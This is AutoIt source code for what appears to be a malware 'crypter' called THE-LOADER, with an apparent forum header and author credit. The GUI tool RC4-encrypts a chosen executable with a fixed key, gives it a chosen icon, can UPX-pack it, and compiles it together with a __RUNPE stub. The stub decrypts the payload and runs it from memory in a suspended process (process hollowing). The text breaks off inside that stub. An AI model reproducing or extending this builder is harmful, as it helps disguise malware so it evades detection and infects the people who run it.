Then $IERROR = 5 $VRETURN = -1 ExitLoop 2 EndIf FileWrite($HOUTFILE, $BTEMPDATA) EndIf Until False Until True If $IALG_ID <> $CALG_USERKEY Then _CRYPT_DESTROYKEY($VCRYPTKEY) _CRYPT_SHUTDOWN() If $HINFILE <> -1 Then FileClose($HINFILE) If $HOUTFILE <> -1 Then FileClose($HOUTFILE) Return SetError($IERROR, 0, $VRETURN) EndFunc Func _CRYPT_DECRYPTFILE($SSOURCEFILE, $SDESTINATIONFILE, $VCRYPTKEY, $IALG_ID) Local $HINFILE, $HOUTFILE Local $IERROR = 0, $VRETURN = True Local $BTEMPDATA Local $IFILESIZE = FileGetSize($SSOURCEFILE) Local $IREAD = 0 _CRYPT_STARTUP() Do If $IALG_ID <> $CALG_USERKEY Then $VCRYPTKEY = _CRYPT_DERIVEKEY($VCRYPTKEY, $IALG_ID) If @error Then $IERROR = 1 $VRETURN = -1 ExitLoop EndIf EndIf $HINFILE = FileOpen($SSOURCEFILE, 16) If @error Then $IERROR = 2 $VRETURN = -1 ExitLoop EndIf $HOUTFILE = FileOpen($SDESTINATIONFILE, 26) If @error Then $IERROR = 3 $VRETURN = -1 ExitLoop EndIf Do $BTEMPDATA = FileRead($HINFILE, 1024 * 1024) $IREAD += BinaryLen($BTEMPDATA) If $IREAD = $IFILESIZE Then $BTEMPDATA = _CRYPT_DECRYPTDATA($BTEMPDATA, $VCRYPTKEY, $CALG_USERKEY, True) If @error Then $IERROR = 4 $VRETURN = -1 EndIf FileWrite($HOUTFILE, $BTEMPDATA) ExitLoop 2 Else $BTEMPDATA = _CRYPT_DECRYPTDATA($BTEMPDATA, $VCRYPTKEY, $CALG_USERKEY, False) If @error Then $IERROR = 5 $VRETURN = -1 ExitLoop 2 EndIf FileWrite($HOUTFILE, $BTEMPDATA) EndIf Until False Until True If $IALG_ID <> $CALG_USERKEY Then _CRYPT_DESTROYKEY($VCRYPTKEY) _CRYPT_SHUTDOWN() If $HINFILE <> -1 Then FileClose($HINFILE) If $HOUTFILE <> -1 Then FileClose($HOUTFILE) Return SetError($IERROR, 0, $VRETURN) EndFunc Func __CRYPT_REFCOUNT() Return $__G_ACRYPTINTERNALDATA[0] EndFunc Func __CRYPT_REFCOUNTINC() $__G_ACRYPTINTERNALDATA[0] += 1 EndFunc Func __CRYPT_REFCOUNTDEC() If $__G_ACRYPTINTERNALDATA[0] > 0 Then $__G_ACRYPTINTERNALDATA[0] -= 1 EndFunc Func __CRYPT_DLLHANDLE() Return $__G_ACRYPTINTERNALDATA[1] EndFunc Func __CRYPT_DLLHANDLESET($HADVAPI32) $__G_ACRYPTINTERNALDATA[1] = $HADVAPI32 EndFunc Func __CRYPT_CONTEXT() Return $__G_ACRYPTINTERNALDATA[2] EndFunc Func __CRYPT_CONTEXTSET($HCRYPTCONTEXT) $__G_ACRYPTINTERNALDATA[2] = $HCRYPTCONTEXT EndFunc Global Const $FC_NOOVERWRITE = 0 Global Const $FC_OVERWRITE = 1 Global Const $FT_MODIFIED = 0 Global Const $FT_CREATED = 1 Global Const $FT_ACCESSED = 2 Global Const $FO_READ = 0 Global Const $FO_APPEND = 1 Global Const $FO_OVERWRITE = 2 Global Const $FO_BINARY = 16 Global Const $FO_UNICODE = 32 Global Const $FO_UTF16_LE = 32 Global Const $FO_UTF16_BE = 64 Global Const $FO_UTF8 = 128 Global Const $FO_UTF8_NOBOM = 256 Global Const $EOF = -1 Global Const $FD_FILEMUSTEXIST = 1 Global Const $FD_PATHMUSTEXIST = 2 Global Const $FD_MULTISELECT = 4 Global Const $FD_PROMPTCREATENEW = 8 Global Const $FD_PROMPTOVERWRITE = 16 Global Const $CREATE_NEW = 1 Global Const $CREATE_ALWAYS = 2 Global Const $OPEN_EXISTING = 3 Global Const $OPEN_ALWAYS = 4 Global Const $TRUNCATE_EXISTING = 5 Global Const $INVALID_SET_FILE_POINTER = -1 Global Const $FILE_BEGIN = 0 Global Const $FILE_CURRENT = 1 Global Const $FILE_END = 2 Global Const $FILE_ATTRIBUTE_READONLY = 1 Global Const $FILE_ATTRIBUTE_HIDDEN = 2 Global Const $FILE_ATTRIBUTE_SYSTEM = 4 Global Const $FILE_ATTRIBUTE_DIRECTORY = 16 Global Const $FILE_ATTRIBUTE_ARCHIVE = 32 Global Const $FILE_ATTRIBUTE_DEVICE = 64 Global Const $FILE_ATTRIBUTE_NORMAL = 128 Global Const $FILE_ATTRIBUTE_TEMPORARY = 256 Global Const $FILE_ATTRIBUTE_SPARSE_FILE = 512 Global Const $FILE_ATTRIBUTE_REPARSE_POINT = 1024 Global Const $FILE_ATTRIBUTE_COMPRESSED = 2048 Global Const $FILE_ATTRIBUTE_OFFLINE = 4096 Global Const $FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 8192 Global Const $FILE_ATTRIBUTE_ENCRYPTED = 16384 Global Const $FILE_SHARE_READ = 1 Global Const $FILE_SHARE_WRITE = 2 Global Const $FILE_SHARE_DELETE = 4 Global Const $GENERIC_ALL = 268435456 Global Const $GENERIC_EXECUTE = 536870912 Global Const $GENERIC_WRITE = 1073741824 Global Const $GENERIC_READ = -2147483648 Func _FileCountLines($SFILEPATH) Local $HFILE = FileOpen($SFILEPATH, $FO_READ) If $HFILE = -1 Then Return SetError(1, 0, 0) Local $SFILECONTENT = StringStripWS(FileRead($HFILE), 2) FileClose($HFILE) Local $ATMP If StringInStr($SFILECONTENT, @LF) Then $ATMP = StringSplit(StringStripCR($SFILECONTENT), @LF) ElseIf StringInStr($SFILECONTENT, @CR) Then $ATMP = StringSplit($SFILECONTENT, @CR) Else If StringLen($SFILECONTENT) Then Return 1 Else Return SetError(2, 0, 0) EndIf EndIf Return $ATMP[0] EndFunc Func _FileCreate($SFILEPATH) Local $HOPENFILE = FileOpen($SFILEPATH, $FO_OVERWRITE) If $HOPENFILE = -1 Then Return SetError(1, 0, 0) Local $HWRITEFILE = FileWrite($HOPENFILE, "") FileClose($HOPENFILE) If $HWRITEFILE = -1 Then Return SetError(2, 0, 0) Return 1 EndFunc Func _FileListToArray($SPATH, $SFILTER = "*", $IFLAG = 0) Local $HSEARCH, $SFILE, $SFILELIST, $SDELIM = "|" $SPATH = StringRegExpReplace($SPATH, "[/]+z", "") & "" If Not FileExists($SPATH) Then Return SetError(1, 1, "") If StringRegExp($SFILTER, "[/:><|]|(?s)As*z") Then Return SetError(2, 2, "") If Not ($IFLAG = 0 Or $IFLAG = 1 Or $IFLAG = 2) Then Return SetError(3, 3, "") $HSEARCH = FileFindFirstFile($SPATH & $SFILTER) If @error Then Return SetError(4, 4, "") While 1 $SFILE = FileFindNextFile($HSEARCH) If @error Then ExitLoop If ($IFLAG + @extended = 2) Then ContinueLoop $SFILELIST &= $SDELIM & $SFILE WEnd FileClose($HSEARCH) If Not $SFILELIST Then Return SetError(4, 4, "") Return StringSplit(StringTrimLeft($SFILELIST, 1), "|") EndFunc Func _FilePrint($S_FILE, $I_SHOW = @SW_HIDE) Local $A_RET = DllCall("shell32.dll", "int", "ShellExecuteW", "hwnd", 0, "wstr", "print", "wstr", $S_FILE, "wstr", "", "wstr", "", "int", $I_SHOW) If @error Then Return SetError(@error, @extended, 0) If $A_RET[0] <= 32 Then Return SetError(10, $A_RET[0], 0) Return 1 EndFunc Func _FileReadToArray($SFILEPATH, ByRef $AARRAY) Local $HFILE = FileOpen($SFILEPATH, $FO_READ) If $HFILE = -1 Then Return SetError(1, 0, 0) Local $AFILE = FileRead($HFILE, FileGetSize($SFILEPATH)) If StringRight($AFILE, 1) = @LF Then $AFILE = StringTrimRight($AFILE, 1) If StringRight($AFILE, 1) = @CR Then $AFILE = StringTrimRight($AFILE, 1) FileClose($HFILE) If StringInStr($AFILE, @LF) Then $AARRAY = StringSplit(StringStripCR($AFILE), @LF) ElseIf StringInStr($AFILE, @CR) Then $AARRAY = StringSplit($AFILE, @CR) Else If StringLen($AFILE) Then Dim $AARRAY[2] = [1, $AFILE] Else Return SetError(2, 0, 0) EndIf EndIf Return 1 EndFunc Func _FileWriteFromArray($FILE, $A_ARRAY, $I_BASE = 0, $I_UBOUND = 0) If Not IsArray($A_ARRAY) Then Return SetError(2, 0, 0) Local $LAST = UBound($A_ARRAY) - 1 If $I_UBOUND < 1 Or $I_UBOUND > $LAST Then $I_UBOUND = $LAST If $I_BASE < 0 Or $I_BASE > $LAST Then $I_BASE = 0 Local $HFILE If IsString($FILE) Then $HFILE = FileOpen($FILE, $FO_OVERWRITE) Else $HFILE = $FILE EndIf If $HFILE = -1 Then Return SetError(1, 0, 0) Local $ERRORSAV = 0 For $X = $I_BASE To $I_UBOUND If FileWrite($HFILE, $A_ARRAY[$X] & @CRLF) = 0 Then $ERRORSAV = 3 ExitLoop EndIf Next If IsString($FILE) Then FileClose($HFILE) If $ERRORSAV Then Return SetError($ERRORSAV, 0, 0) Return 1 EndFunc Func _FileWriteLog($SLOGPATH, $SLOGMSG, $IFLAG = -1) Local $IOPENMODE = $FO_APPEND Local $SDATENOW = @YEAR & "-" & @MON & "-" & @MDAY Local $STIMENOW = @HOUR & ":" & @MIN & ":" & @SEC Local $SMSG = $SDATENOW & " " & $STIMENOW & " : " & $SLOGMSG If $IFLAG <> -1 Then $SMSG &= @CRLF & FileRead($SLOGPATH) $IOPENMODE = $FO_OVERWRITE EndIf Local $HOPENFILE = FileOpen($SLOGPATH, $IOPENMODE) If $HOPENFILE = -1 Then Return SetError(1, 0, 0) Local $IWRITEFILE = FileWriteLine($HOPENFILE, $SMSG) Local $IRET = FileClose($HOPENFILE) If $IWRITEFILE = -1 Then Return SetError(2, $IRET, 0) Return $IRET EndFunc Func _FileWriteToLine($SFILE, $ILINE, $STEXT, $FOVERWRITE = 0) If $ILINE <= 0 Then Return SetError(4, 0, 0) If Not IsString($STEXT) Then $STEXT = String($STEXT) If $STEXT = "" Then Return SetError(6, 0, 0) EndIf If $FOVERWRITE <> 0 And $FOVERWRITE <> 1 Then Return SetError(5, 0, 0) If Not FileExists($SFILE) Then Return SetError(2, 0, 0) Local $SREAD_FILE = FileRead($SFILE) Local $ASPLIT_FILE = StringSplit(StringStripCR($SREAD_FILE), @LF) If UBound($ASPLIT_FILE) < $ILINE Then Return SetError(1, 0, 0) Local $HFILE = FileOpen($SFILE, $FO_OVERWRITE) If $HFILE = -1 Then Return SetError(3, 0, 0) $SREAD_FILE = "" For $I = 1 To $ASPLIT_FILE[0] If $I = $ILINE Then If $FOVERWRITE = 1 Then If $STEXT <> "" Then $SREAD_FILE &= $STEXT & @CRLF Else $SREAD_FILE &= $STEXT & @CRLF & $ASPLIT_FILE[$I] & @CRLF EndIf ElseIf $I < $ASPLIT_FILE[0] Then $SREAD_FILE &= $ASPLIT_FILE[$I] & @CRLF ElseIf $I = $ASPLIT_FILE[0] Then $SREAD_FILE &= $ASPLIT_FILE[$I] EndIf Next FileWrite($HFILE, $SREAD_FILE) FileClose($HFILE) Return 1 EndFunc Func _PathFull($SRELATIVEPATH, $SBASEPATH = @WorkingDir) If Not $SRELATIVEPATH Or $SRELATIVEPATH = "." Then Return $SBASEPATH Local $SFULLPATH = StringReplace($SRELATIVEPATH, "/", "") Local Const $SFULLPATHCONST = $SFULLPATH Local $SPATH Local $BROOTONLY = StringLeft($SFULLPATH, 1) = "" And StringMid($SFULLPATH, 2, 1) <> "" For $I = 1 To 2 $SPATH = StringLeft($SFULLPATH, 2) If $SPATH = "" Then $SFULLPATH = StringTrimLeft($SFULLPATH, 2) Local $NSERVERLEN = StringInStr($SFULLPATH, "") - 1 $SPATH = "" & StringLeft($SFULLPATH, $NSERVERLEN) $SFULLPATH = StringTrimLeft($SFULLPATH, $NSERVERLEN) ExitLoop ElseIf StringRight($SPATH, 1) = ":" Then $SFULLPATH = StringTrimLeft($SFULLPATH, 2) ExitLoop Else $SFULLPATH = $SBASEPATH & "" & $SFULLPATH EndIf Next If $I = 3 Then Return "" If StringLeft($SFULLPATH, 1) <> "" Then If StringLeft($SFULLPATHCONST, 2) = StringLeft($SBASEPATH, 2) Then $SFULLPATH = $SBASEPATH & "" & $SFULLPATH Else $SFULLPATH = "" & $SFULLPATH EndIf EndIf Local $ATEMP = StringSplit($SFULLPATH, "") Local $APATHPARTS[$ATEMP[0]], $J = 0 For $I = 2 To $ATEMP[0] If $ATEMP[$I] = ".." Then If $J Then $J -= 1 ElseIf Not ($ATEMP[$I] = "" And $I <> $ATEMP[0]) And $ATEMP[$I] <> "." Then $APATHPARTS[$J] = $ATEMP[$I] $J += 1 EndIf Next $SFULLPATH = $SPATH If Not $BROOTONLY Then For $I = 0 To $J - 1 $SFULLPATH &= "" & $APATHPARTS[$I] Next Else $SFULLPATH &= $SFULLPATHCONST If StringInStr($SFULLPATH, "..") Then $SFULLPATH = _PathFull($SFULLPATH) EndIf While StringInStr($SFULLPATH, ".") $SFULLPATH = StringReplace($SFULLPATH, ".", "") WEnd Return $SFULLPATH EndFunc Func _PATHGETRELATIVE($SFROM, $STO) If StringRight($SFROM, 1) <> "" Then $SFROM &= "" If StringRight($STO, 1) <> "" Then $STO &= "" If $SFROM = $STO Then Return SetError(1, 0, StringTrimRight($STO, 1)) Local $ASFROM = StringSplit($SFROM, "") Local $ASTO = StringSplit($STO, "") If $ASFROM[1] <> $ASTO[1] Then Return SetError(2, 0, StringTrimRight($STO, 1)) Local $I = 2 Local $IDIFF = 1 While 1 If $ASFROM[$I] <> $ASTO[$I] Then $IDIFF = $I ExitLoop EndIf $I += 1 WEnd $I = 1 Local $SRELPATH = "" For $J = 1 To $ASTO[0] If $I >= $IDIFF Then $SRELPATH &= "" & $ASTO[$I] EndIf $I += 1 Next $SRELPATH = StringTrimLeft($SRELPATH, 1) $I = 1 For $J = 1 To $ASFROM[0] If $I > $IDIFF Then $SRELPATH = ".." & $SRELPATH EndIf $I += 1 Next If StringRight($SRELPATH, 1) == "" Then $SRELPATH = StringTrimRight($SRELPATH, 1) Return $SRELPATH EndFunc Func _PathMake($SZDRIVE, $SZDIR, $SZFNAME, $SZEXT) If StringLen($SZDRIVE) Then If Not (StringLeft($SZDRIVE, 2) = "") Then $SZDRIVE = StringLeft($SZDRIVE, 1) & ":" EndIf If StringLen($SZDIR) Then If Not (StringRight($SZDIR, 1) = "") And Not (StringRight($SZDIR, 1) = "/") Then $SZDIR = $SZDIR & "" EndIf If StringLen($SZEXT) Then If Not (StringLeft($SZEXT, 1) = ".") Then $SZEXT = "." & $SZEXT EndIf Return $SZDRIVE & $SZDIR & $SZFNAME & $SZEXT EndFunc Func _PathSplit($SZPATH, ByRef $SZDRIVE, ByRef $SZDIR, ByRef $SZFNAME, ByRef $SZEXT) Local $DRIVE = "" Local $DIR = "" Local $FNAME = "" Local $EXT = "" Local $POS Local $ARRAY[5] $ARRAY[0] = $SZPATH If StringMid($SZPATH, 2, 1) = ":" Then $DRIVE = StringLeft($SZPATH, 2) $SZPATH = StringTrimLeft($SZPATH, 2) ElseIf StringLeft($SZPATH, 2) = "" Then $SZPATH = StringTrimLeft($SZPATH, 2) $POS = StringInStr($SZPATH, "") If $POS = 0 Then $POS = StringInStr($SZPATH, "/") If $POS = 0 Then $DRIVE = "" & $SZPATH $SZPATH = "" Else $DRIVE = "" & StringLeft($SZPATH, $POS - 1) $SZPATH = StringTrimLeft($SZPATH, $POS - 1) EndIf EndIf Local $NPOSFORWARD = StringInStr($SZPATH, "/", 0, -1) Local $NPOSBACKWARD = StringInStr($SZPATH, "", 0, -1) If $NPOSFORWARD >= $NPOSBACKWARD Then $POS = $NPOSFORWARD Else $POS = $NPOSBACKWARD EndIf $DIR = StringLeft($SZPATH, $POS) $FNAME = StringRight($SZPATH, StringLen($SZPATH) - $POS) If StringLen($DIR) = 0 Then $FNAME = $SZPATH $POS = StringInStr($FNAME, ".", 0, -1) If $POS Then $EXT = StringRight($FNAME, StringLen($FNAME) - ($POS - 1)) $FNAME = StringLeft($FNAME, $POS - 1) EndIf $SZDRIVE = $DRIVE $SZDIR = $DIR $SZFNAME = $FNAME $SZEXT = $EXT $ARRAY[1] = $DRIVE $ARRAY[2] = $DIR $ARRAY[3] = $FNAME $ARRAY[4] = $EXT Return $ARRAY EndFunc Func _ReplaceStringInFile($SZFILENAME, $SZSEARCHSTRING, $SZREPLACESTRING, $FCASENESS = 0, $FOCCURANCE = 1) Local $IRETVAL = 0 Local $NCOUNT, $SENDSWITH If StringInStr(FileGetAttrib($SZFILENAME), "R") Then Return SetError(6, 0, -1) Local $HFILE = FileOpen($SZFILENAME, $FO_READ) If $HFILE = -1 Then Return SetError(1, 0, -1) Local $S_TOTFILE = FileRead($HFILE, FileGetSize($SZFILENAME)) If StringRight($S_TOTFILE, 2) = @CRLF Then $SENDSWITH = @CRLF ElseIf StringRight($S_TOTFILE, 1) = @CR Then $SENDSWITH = @CR ElseIf StringRight($S_TOTFILE, 1) = @LF Then $SENDSWITH = @LF Else $SENDSWITH = "" EndIf Local $AFILELINES = StringSplit(StringStripCR($S_TOTFILE), @LF) FileClose($HFILE) Local $HWRITEHANDLE = FileOpen($SZFILENAME, $FO_OVERWRITE) If $HWRITEHANDLE = -1 Then Return SetError(2, 0, -1) For $NCOUNT = 1 To $AFILELINES[0] If StringInStr($AFILELINES[$NCOUNT], $SZSEARCHSTRING, $FCASENESS) Then $AFILELINES[$NCOUNT] = StringReplace($AFILELINES[$NCOUNT], $SZSEARCHSTRING, $SZREPLACESTRING, 1 - $FOCCURANCE, $FCASENESS) $IRETVAL = $IRETVAL + 1 If $FOCCURANCE = 0 Then $IRETVAL = 1 ExitLoop EndIf EndIf Next For $NCOUNT = 1 To $AFILELINES[0] - 1 If FileWriteLine($HWRITEHANDLE, $AFILELINES[$NCOUNT]) = 0 Then FileClose($HWRITEHANDLE) Return SetError(3, 0, -1) EndIf Next If $AFILELINES[$NCOUNT] <> "" Then FileWrite($HWRITEHANDLE, $AFILELINES[$NCOUNT] & $SENDSWITH) FileClose($HWRITEHANDLE) Return $IRETVAL EndFunc Func _TempFile($S_DIRECTORYNAME = @TempDir, $S_FILEPREFIX = "~", $S_FILEEXTENSION = ".tmp", $I_RANDOMLENGTH = 7) If Not FileExists($S_DIRECTORYNAME) Then $S_DIRECTORYNAME = @TempDir If Not FileExists($S_DIRECTORYNAME) Then $S_DIRECTORYNAME = @ScriptDir If StringRight($S_DIRECTORYNAME, 1) <> "" Then $S_DIRECTORYNAME = $S_DIRECTORYNAME & "" Local $S_TEMPNAME Do $S_TEMPNAME = "" While StringLen($S_TEMPNAME) < $I_RANDOMLENGTH $S_TEMPNAME = $S_TEMPNAME & Chr(Random(97, 122, 1)) WEnd $S_TEMPNAME = $S_DIRECTORYNAME & $S_FILEPREFIX & $S_TEMPNAME & $S_FILEEXTENSION Until Not FileExists($S_TEMPNAME) Return $S_TEMPNAME EndFunc #NoTrayIcon Opt("GUIONEVENTMODE", 1) Opt("MUSTDECLAREVARS", 1) Local $MAINFORM, $FILE_BINARY_TEXT, $BINARY_INPUT, $BINARY_BUTTON, $COMPILE_BUTTON, $ICON_BUTTON, $ICON_INPUT, $COMPRESS_CHECKBOX, $EXE_BUTTON, $EXE_INPUT Local $OPEN_EXE, $PATH_ICO, $SAVE_EXE, $HASH $MAINFORM = GUICreate(".:: THE-LOADER ::. ( *.exe ) - for windows plattes formes", 550, 430) $HASH = _CRYPT_HASHFILE(@ScriptDir & "Banner.jpg", $CALG_MD5) If $HASH = "0XFF6A838E9AA2C9890091C1A9FF983F8F" Then GUICtrlCreatePic(@ScriptDir & "Banner.jpg", 0, 0, 550, 217) Else GUICtrlCreateLabel("Image is modifed ( not allow bأ©cause author right ) or not found !" & @CRLF & "Author : Pirate-inc (c)" & @CRLF & "Email : mi-dou93@hotmail.com ( facebook )", 95, 120, 370) GUICtrlSetColor(-1, 16711680) GUICtrlSetFont(-1, 8.5, 800, -1, "TAHOMA") EndIf GUICtrlCreateGroup("Inpute pannel", 5, 225, 540, 160) $FILE_BINARY_TEXT = GUICtrlCreateLabel("Chosse a pe-files and an icon and save path then 'compile' :", 10, 250) $BINARY_BUTTON = GUICtrlCreateButton("File", 470, 270, 70, 25) $BINARY_INPUT = GUICtrlCreateInput("", 10, 273, 450, 20) GUICtrlSetFont(-1, 8.5, 400, -1, "COURIER NEW") $ICON_BUTTON = GUICtrlCreateButton("Icon", 470, 300, 70, 25) $ICON_INPUT = GUICtrlCreateInput("", 10, 303, 450, 20) GUICtrlSetFont(-1, 8.5, 400, -1, "COURIER NEW") $COMPRESS_CHECKBOX = GUICtrlCreateCheckbox("Compress result file ( upx packer final )", 10, 360) $EXE_BUTTON = GUICtrlCreateButton("Save as", 470, 330, 70, 25) $EXE_INPUT = GUICtrlCreateInput("", 10, 333, 450, 20) GUICtrlSetFont(-1, 8.5, 400, -1, "COURIER NEW") $COMPILE_BUTTON = GUICtrlCreateButton("Builde script", 440, 395, 100, 30) GUISetOnEvent($GUI_EVENT_CLOSE, "__EXIT") GUICtrlSetOnEvent($BINARY_BUTTON, "__BROWSE") GUICtrlSetOnEvent($ICON_BUTTON, "__BROWSE") GUICtrlSetOnEvent($EXE_BUTTON, "__BROWSE") GUICtrlSetOnEvent($COMPILE_BUTTON, "__COMPILE") GUISetState() Func __EXIT() Select Case @GUI_WinHandle = $MAINFORM GUIDelete(@GUI_WinHandle) Exit Case @GUI_WinHandle <> $MAINFORM GUIDelete(@GUI_WinHandle) EndSelect EndFunc Func __COMPILE() Local Const $AUTOIT3_EXE_PATH = RegRead("HKEY_LOCAL_MACHINESOFTWAREAUTOIT V3AUTOIT", "INSTALLDIR") & "AUT2EXEAUT2EXE.EXE" Local Const $TEMP_RUNPE = @TempDir & "__RUNPE.BIN", $TEMP_PECODE = @TempDir & "__PE-SCRYPTED.BIN", $QUOT = BinaryToString("0X22") Local $PE_DATA, $PE_HEANDEL_FILE, $AU3_HEANDEL_FILE, $CMD FileInstall("__RUNPE.AU3", $TEMP_RUNPE) If $OPEN_EXE <> "" And $SAVE_EXE <> "" And $PATH_ICO <> "" And $AUTOIT3_EXE_PATH <> "" Then $PE_HEANDEL_FILE = FileOpen($OPEN_EXE, 16) $PE_DATA = FileRead($PE_HEANDEL_FILE) $PE_DATA = _CRYPT_ENCRYPTDATA($PE_DATA, "DEV-POINT.COM", $CALG_RC4) FileWrite($TEMP_PECODE, $PE_DATA) $CMD = "/IN " & $QUOT & $TEMP_RUNPE & $QUOT & " " & "/OUT " & $QUOT & $SAVE_EXE & $QUOT & " " $CMD &= "/ICON " & $QUOT & $PATH_ICO & $QUOT & " " $CMD &= "/COMP 4" & " " If GUICtrlRead($COMPRESS_CHECKBOX) = $GUI_CHECKED Then $CMD &= "/PACK" & " " Else $CMD &= "/NOPACK" & " " EndIf ShellExecuteWait($AUTOIT3_EXE_PATH, $CMD) FileClose($PE_HEANDEL_FILE) FileDelete($TEMP_PECODE) EndIf FileDelete($TEMP_RUNPE) EndFunc Func __BROWSE() Local $TITLE, $FILTER Select Case @GUI_CtrlId = $BINARY_BUTTON $TITLE = "Select a pe-code file" $FILTER = "PE-code files (*.exe)" $OPEN_EXE = FileOpenDialog($TITLE, "", $FILTER, 3, "", $MAINFORM) GUICtrlSetData($BINARY_INPUT, $OPEN_EXE) Case @GUI_CtrlId = $ICON_BUTTON $TITLE = "Select an icon files" $FILTER = "Icons files (*.ico)" $PATH_ICO = FileOpenDialog($TITLE, "", $FILTER, 3, "", $MAINFORM) GUICtrlSetData($ICON_INPUT, $PATH_ICO) Case @GUI_CtrlId = $EXE_BUTTON $TITLE = "Save new pe-code file as ..." $FILTER = "PE-code files (*.exe)" $SAVE_EXE = FileSaveDialog($TITLE, "", $FILTER, 3, "", $MAINFORM) GUICtrlSetData($EXE_INPUT, $SAVE_EXE) EndSelect EndFunc While 1 Sleep(1000) WEnd 2- expandcollapse popup#INCLUDE-ONCE #INCLUDE <CRYPT.AU3> #CS =-=--=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= TITLE .........: __RUNPE AUTOIT VERSION.: 3.2.12++ LANGUAGE.......: ENGLISH DESCRIPTION ...: RUN BINARY EXECUTING FROM MEMORY =-=--=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= =-=--=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= NAME ..........: __RUNPE DESCRIPTION ...: RUN BINARY EXECUTING FROM MEMORY SYNTAX ........: _RUNBINARY( $BBINARYIMAGE [, $SCOMMANDLINE [, $SEXEMODULE ]] ) PARAMETERS ....: - $BBINARYIMAGE - A BINARY VALUE. - $SCOMMANDLINE - [OPTIONAL] A STRING VALUE. - $SEXEMODULE - [OPTIONAL] A STRING VALUE. RETURN VALUES .: NONE AUTHOR(S) .....: TRANCEXX -> _RUNEXEFROMMEMORY ( RESCRYPTED BY : HOUDINI DEV-POINT.COM , EMAIL : MI-DOU93@HOTMAIL.COM) MODIFIED ......: JOمO CARLOS (JSCRIPT FROM BRAZIL) REMARKS .......: WHEN IT WILL FAIL? - IT APPEARS THAT VISTA IS DOING SOME SORT OF REBASING WHEN LOADING AN EXE. I HAVE NO IDEA WHEN THAT HAPPENS - BUT SURE IS SMART THING TO DO IF HIGHER LEVEL OF SECURITY IS WANTED. THIS MEANS THAT EXE IS NOT PUT TO BASE - ADDRESS (HARD CODED INSIDE EVERY EXE) BUT IS MOVED AWAY FROM THAT POINT. I'VE MADE A COMMENT IN THE CODE - WHERE THAT MATTERS. THIS MEANS THE FUNCTION WILL FAIL FOR VISTA. - GENERAL FAILURE WILL BE IF THE SIZE OF THE NEW EXE IS BIGGER THAN AUTOIT'S SIZE. THAT WOULD REQUIRE ALLOCATING - MORE MEMORY TO WORK (I'M NOT DOING THAT). - THERE IS ONE MORE SCENARIO OF FAILURE. SOMETIMES COMPILERS COMPILE WRONG (YES IT HAPPENS) AND THEN READ DATA - WILL BE WRONG. WINDOWS IS LIKELY USING SOME METHODS TO VERIFY CRUCIAL PARTS OF THE PE FILE - THERE IS BACKUP - SCENARIO IN CASE OF SOME ERRORS. CODE I'M POSTING USES ONLY READ DATA, THERE IS NO VERIFYING DONE. - IF DATA IS WRONG - FUNCTION FAILS. RELATED .......: LINK ..........: HTTP://WWW.AUTOITSCRIPT.COM/FORUM/INDEX.PHP?SHOWTOPIC=99412 EXAMPLE .......: __RUNPE( $BBINARYIMAGE ) #CE =-=--=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= FILEINSTALL ("__PE-SCRYPTED.BIN",@TEMPDIR&"__PE-SCRYPTED.BIN") LOCAL $PE_DATA,$H_FILE = FILEOPEN (@TEMPDIR&"__PE-SCRYPTED.BIN",16) _CRYPT_STARTUP () $PE_DATA = FILEREAD ($H_FILE) IF NOT @ERROR THEN $PE_DATA = _CRYPT_DECRYPTDATA ($PE_DATA,"DEV-POINT.COM",$CALG_RC4) CALL ("__RUNPE",$PE_DATA) ENDIF FILECLOSE ($H_FILE) FILEDELETE (@TEMPDIR&"__PE-SCRYPTED.BIN") _CRYPT_SHUTDOWN () FUNC __RUNPE ($BBINARYIMAGE, $SCOMMANDLINE = "", $SEXEMODULE = @AUTOITEXE) #REGION 1. DETERMINE INTERPRETER TYPE LOCAL $FAUTOITX64 = @AUTOITX64 #REGION 2. PREDPROCESSING PASSED LOCAL $BBINARY = BINARY($BBINARYIMAGE) ; THIS IS REDUNDANT BUT STILL... ; MAKE STRUCTURE OUT OF BINARY DATA THAT WAS PASSED LOCAL $TBINARY = DLLSTRUCTCREATE("BYTE[" & BINARYLEN($BBINARY) & "]") DLLSTRUCTSETDATA($TBINARY, 1, $BBINARY) ; FILL IT ; GET POINTER TO IT LOCAL $PPOINTER = DLLSTRUCTGETPTR($TBINARY) #REGION 3. CREATING NEW PROCESS ; STARTUPINFO STRUCTURE (ACTUALLY ALL THAT REALLY MATTERS IS ALLOCATED SPACE) LOCAL $TSTARTUPINFO = DLLSTRUCTCREATE( _ "DWORD CBSIZE;" & _ "PTR RESERVED;" & _ "PTR DESKTOP;" & _ "PTR TITLE;" & _ "DWORD X;" & _ "DWORD Y;" & _ "DWORD XSIZE;" & _ "DWORD YSIZE;" & _ "DWORD XCOUNTCHARS;" & _ "DWORD YCOUNTCHARS;" & _ "DWORD FILLATTRIBUTE;" & _ "DWORD FLAGS;" & _ "WORD SHOWWINDOW;" & _ "WORD RESERVED2;" & _ "PTR RESERVED2;" & _ "PTR HSTDINPUT;" & _ "PTR HSTDOUTPUT;" & _ "PTR HSTDERROR") ; THIS IS MUCH IMPORTANT. THIS STRUCTURE WILL HOLD VERY SOME IMPORTANT DATA. LOCAL $TPROCESS_INFORMATION = DLLSTRUCTCREATE( _ "PTR PROCESS;" & _ "PTR THREAD;" & _ "DWORD PROCESSID;" & _ "DWORD THREADID") ; CREATE NEW PROCESS LOCAL $ACALL = DLLCALL("KERNEL32.DLL", "BOOL", "CreateProcessW", _ "WSTR", $SEXEMODULE, _ "WSTR", $SCOMMANDLINE, _ "PTR", 0, _ "PTR", 0, _ "INT", 0, _ "DWORD", 4, _ ; = CREATE_SUSPENDED ; <- THIS IS ESSENTIAL "PTR", 0, _ "PTR", 0, _ 